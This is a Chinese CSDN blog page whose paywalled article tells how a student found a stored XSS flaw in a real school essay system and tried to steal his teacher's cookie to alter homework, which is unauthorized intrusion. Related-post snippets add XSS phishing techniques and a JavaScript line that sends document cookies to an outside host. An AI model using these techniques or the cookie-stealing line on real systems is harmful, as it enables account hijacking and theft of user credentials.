利用XSS钓鱼英语老师

最新推荐文章于 2023-10-05 14:39:46 发布
置顶 VIP文章 最新推荐文章于 2023-10-05 14:39:46 发布
阅读量1.8k 收藏 5
点赞数 3
文章标签: 漏洞 钓鱼 XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/geekwei/article/details/71421389
版权

      这几天刚把关于XSS的网课搞定,然而本帅已经不满足于在本地环境下测试。想到因为学网课把英语老师在iwrite系统上布置的好几篇作文落下,登入iwrite发现前面好多作业已经过期了,此时本帅的内心是哇凉哇凉的,万一就因为这不起眼的平时分导致挂科那是多不划算啊!

        于是乎,本帅有了个邪恶的想法——在标题区,写作区测试下是否存在XSS,有的话,完全可以利用XSS盲打老师后台cookie,得到cookie后,嘿嘿嘿..........

        说明下为什么会先测试标题区和写作区,因为这里是写英语作文的啊!同志们,英文啊 。。。 开发者十有八九不会过滤 "<"  ">"这种符号啦,script , alert 这种单词我更不信他会过滤。so,先尝试下简单的payload 


    

    弹窗了!它居然弹窗了!哇哇哇,不会吧,一不小心就找到个存储型xss


            F12 调出firebug,确定触发xss的位置


   再查看下cookie,傻眼了,设置了http only,这就意味着无法通过JS读取老师的cookie

最低0.47元/天 解锁文章
Geekwei
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
XSS钓鱼攻击演示。
weixin_44720762的博客
05-01 3386
basic认证的钓鱼攻击: 在存在xss漏洞的页面去嵌入一个向用户端提交的请求程序(javascript或者是链接请求。)当用户打开了这个链接,就会向后台发送请求,后台会返回一个如上图所示的basic认证的头部。在用户的安全意识不强,为察觉出其中异样的情况下如实输入了自己的用户信息。这时候信息被发送到攻击人员的接受端。 相关的嵌入代码 相关的basic认证提示框代码 xfish原代码 具体内容:...
xss漏洞钓鱼
rescure的博客
01-21 1004
利用xss漏洞钓鱼 简要:由于资金问题,没有自己的网站,故在此用xss平台和dvwa实现xss反射型钓鱼操作 NO.1 正常进入dvwa,模式选择为low,使用xss(refelect) 进入xss平台,选择创建项目,在此为dvwa,创建之后,选择功能默认即可 ,随后平台会生成自己的js代码 NO.2 接下来,复制生成的js代码,粘贴至xss漏洞处(具体情况需要自己分析是什么类型的) 接下来就是copy大法了 ...
xss防御之php利用httponly防xss攻击
12-19
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。 如下js获取cookie信息: 复制代码 代码如下:url=document.top.location.href;cookie=[removed];c=new Image();c.src=’http://www.test.com/c.php?c=’+cookie+’&u=’+url; 一般cookie都是从document对象中获取的,现在浏览
反射型xss钓鱼盗取用户cookie
m0_53820621的博客
01-16 4353
演示用靶场:dvwa
利用XSS进行网页钓鱼
Monsterlz123的博客
07-22 6492
XSS漏洞利用XSS进行网页钓鱼 Hello 各位小伙伴周末晚上好 这里是你们微胖的小编Monster。 话说小编的老妈今天给小编打电话,叮嘱我平时吃饭少吃一点… 说昨天看我朋友圈发的照片,已经从以前的瓜子脸,变成国字脸了… Whatever,让我们一起来看看今天的内容吧 一、实验概述 实验拓扑: 利用XSS漏洞,我们可以在网页中插入恶意js代码,通过js代码,我们可以干很多事情,例...
Pikachu——Xss钓鱼
m0_60767986的博客
04-23 6990
前端js代码限制输入框只能提交20个字段,将它修改为100即可(当然,这是get型xss,可以直接在url传参处添加攻击语句)提交攻击语句后发现,跳转回了靶场首页,网页debug发现:第一:请求了指定的钓鱼页面的url,并在后面携带了我的cookie信息第二:跳转回靶场首页(前面“靶场cookie获取的额外操作”的结果,用来抵消受害者的怀疑)
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 2845
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
网络攻防|XSS Flash弹窗钓鱼
weixin_42282189的博客
11-15 2646
作者: Overture 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 xss弹出flash更新是一种常见的钓鱼手法,本文介绍一下整体思路和部分技术细节。 注意:任何未经授权的渗透都是违法行为,本文仅用于技术讨论,切勿用于违法途径 前期准备 服务器及域名 flash页面 免杀木马 前提条件:目标网站存在存储型xss漏洞或者已经getshell能够修改源码,通过请求你插入的js代码触发flash升级弹窗,跳转到准备好的flash下载界面下载安装,触发木马上线cs.
渗透测试-xss钓鱼测试和xss盲打
lza20001103的博客
04-24 2224
渗透测试-xss钓鱼测试和xss盲打
作者如何利用xss漏洞shua盒子rank的1
08-04
前言:标题真不真,继续往下看,为什么要作者选择这个提交平台,一是作者真菜,二是好过吧,只要是存储 xss 就给过本篇是作者的 xss 备忘录阶段小结,所以读者很
xss利用于挖掘
08-17
学习xss利用及挖掘的好资料,有助于新手安全学习入门使用
XSS利用文档
05-23
反射性跨站脚本攻击的利用解析, XSS的高级利用部分总结,XSS跨站脚本攻击汇总。
利用xss漏洞结合xss平台实现社工钓鱼
2ed
01-03 7156
本文主要介绍如何结合 xss平台 利用xss漏洞 然后,伪造一个钓鱼登陆页,然后,实现钓鱼,获取 用户和密码,之后传到我们的公网服务器中 首先我们需要一个存在xss漏洞的网站,不管是反射或存储,只要它有txtx ,然后呢你还得有一台公网服务器,当然在局域网中的话就可以考虑用自己的物理机开一个web服务器。用来接收钓鱼页 post回来的用户和密码。然后呢 随便去个xss平台注册 ,我注册的是这个x...
xss漏洞】存储型XSS漏洞钓鱼及键盘记录
weixin_43526443的博客
04-24 600
一、攻击方脚本代码     1. 钓鱼脚本 1.1.1 弹出伪造验证框脚本 <?php error_reporting(0); // var_dump($_SERVER); if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) { //发送...
什么是xss攻击?
小伟的博客
04-10 4486
跨站脚本攻击(XSS),英文全称 Cross Site Script   XSS攻击,一般是指黑客通过在网页中注入恶意脚本,当用户浏览网页时,恶意脚本执行,控制用户浏览器行为的一种攻击方式   XSS攻击分为三种,反射型XSS、存储型XSS、DOM Based XSS. 了解什么是xss攻击,例子:   本地服务器demo目录下有个index.php,通过提交信息显示在页面上显示数据。   正常情况下:http:localhost/demo/index.php?name=张三,   网页上就会显
xss基础认证钓鱼代码收集
一个安全研究员
12-26 2840
i了i了
XSS钓鱼攻击
WINDY_PACE的博客
05-13 1344
XSS 不与后台服务器产⽣数据交互,通过前端的dom节点形成的XSS漏洞,跟服务器⽆关。⼀...
XSS攻击
weixin_45200712的博客
10-11 205
XSS攻击 利用XSS进行网页钓鱼 个人总结: 网络钓鱼 伪造登陆页面,当用户刷新网页时触发XSS攻击,页面会弹出一个基础认证框,用户误以为是正规网站需要再次进行秘密校验,输入当前用户名和密码,用户在此输入的账号和密码会被攻击者通过服务器上预设的接受页面进行保存,这样一次基础的XSS漏洞的基础认证钓鱼就完成了。使用iframe标签,用户访问漏洞页面时,自动访问攻击者服务器的钓鱼页面,出现登录弹窗。 XSS攻击原理 在网站留言板、评论处等输入点,插入恶意脚本HTML代码,由于网站程序对用户输入过滤不严格
grpcio-1.47.0-cp310-cp310-linux_armv7l.whl
最新发布
05-22
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
dvwa中利用xss漏洞绕过csrf漏洞
05-20
在DVWA中,可以使用以下步骤来利用XSS漏洞绕过CSRF漏洞: 1. 打开DVWA,进入CSRF页面。在这个页面上,你将需要创建一个新的帖子。 2. 在新帖子的标题中,我们可以插入一段XSS代码,例如:`<script>document.forms...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值